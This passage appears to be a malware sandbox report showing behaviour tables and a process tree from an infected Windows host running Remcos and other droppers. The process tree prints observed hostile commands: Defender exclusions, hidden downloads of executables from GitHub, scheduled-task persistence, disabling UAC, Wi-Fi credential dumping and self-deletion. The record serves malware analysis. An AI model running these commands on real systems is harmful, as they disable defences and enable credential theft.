| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\xx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\ctx.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\xx.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\x.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
"C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe
"C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe"
C:\Users\Admin\AppData\Local\Temp\a\x.exe
"C:\Users\Admin\AppData\Local\Temp\a\x.exe"
C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe
"C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\x.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
C:\Users\Admin\AppData\Local\Temp\a\system32.exe
"C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
C:\Users\Admin\AppData\Local\Temp\a\system32.exe
"C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Users\Admin\AppData\Local\Temp\a\Update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
C:\Users\Admin\AppData\Local\Temp\a\main.exe
"C:\Users\Admin\AppData\Local\Temp\a\main.exe"
C:\Users\Admin\AppData\Local\Temp\a\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmp.exe"
C:\Users\Admin\AppData\Local\Temp\a\main.exe
"C:\Users\Admin\AppData\Local\Temp\a\main.exe"
C:\Users\Admin\AppData\Local\Temp\a\shost.exe
"C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
C:\Users\Admin\AppData\Local\Temp\a\shost.exe
"C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
"C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
"C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
C:\Users\Admin\AppData\Local\Temp\a\phost.exe
"C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
C:\Users\Admin\AppData\Local\Temp\a\phost.exe
"C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
C:\Users\Admin\AppData\Local\Temp\a\in.exe
"C:\Users\Admin\AppData\Local\Temp\a\in.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6D05.tmp\6D06.tmp\6D07.bat C:\Users\Admin\AppData\Local\Temp\a\in.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
C:\Windows\system32\calc.exe
calc.exe
C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 86F3BB8553A7F4C1CE815233DF5C81AA C
C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe
"C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2449F8A77DB6A87D22B117B2ADA16E86
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSIC837.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259573838 1 CustomActions!CustomActions.CustomActions.StartApp
C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe
"C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe"
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSICC0E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259575040 7 CustomActions!CustomActions.CustomActions.InstallPing
C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C172B12E59B620CAF85F08E9DEA4BA1D C
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
C:\Users\Admin\AppData\Local\Temp\a\null.exe
"C:\Users\Admin\AppData\Local\Temp\a\null.exe"
C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe
"C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe"
C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe"
C:\Users\Admin\AppData\Local\Temp\a\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\a\ssg.exe"
C:\Users\Admin\AppData\Local\Temp\a\xx.exe
"C:\Users\Admin\AppData\Local\Temp\a\xx.exe"
C:\Users\Admin\AppData\Local\Temp\a\cx.exe
"C:\Users\Admin\AppData\Local\Temp\a\cx.exe"
C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe"
C:\Users\Admin\AppData\Local\Temp\a\dropper.exe
"C:\Users\Admin\AppData\Local\Temp\a\dropper.exe"
C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Users\Admin\AppData\Local\Temp\a\ctx.exe
"C:\Users\Admin\AppData\Local\Temp\a\ctx.exe"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\vvv.exe
"C:\Users\Admin\AppData\Local\Temp\a\vvv.exe"
C:\Users\Admin\AppData\Local\Temp\a\null.exe
"C:\Users\Admin\AppData\Local\Temp\a\null.exe"
C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
C:\Users\Admin\AppData\Local\Temp\a\connect.exe
"C:\Users\Admin\AppData\Local\Temp\a\connect.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\063565911205_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe
"C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4700 -s 636
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\system32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\system32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\system32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5916_133786977294628000\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\063565911205_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\system32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\system32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\system32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFE1D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpFE1D.tmp.bat
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp762.tmp"
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
"C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7956 -s 660
C:\Windows\system32\taskeng.exe
taskeng.exe {2CF4428E-56FB-4D7F-86AA-B3F82BCBE96D} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
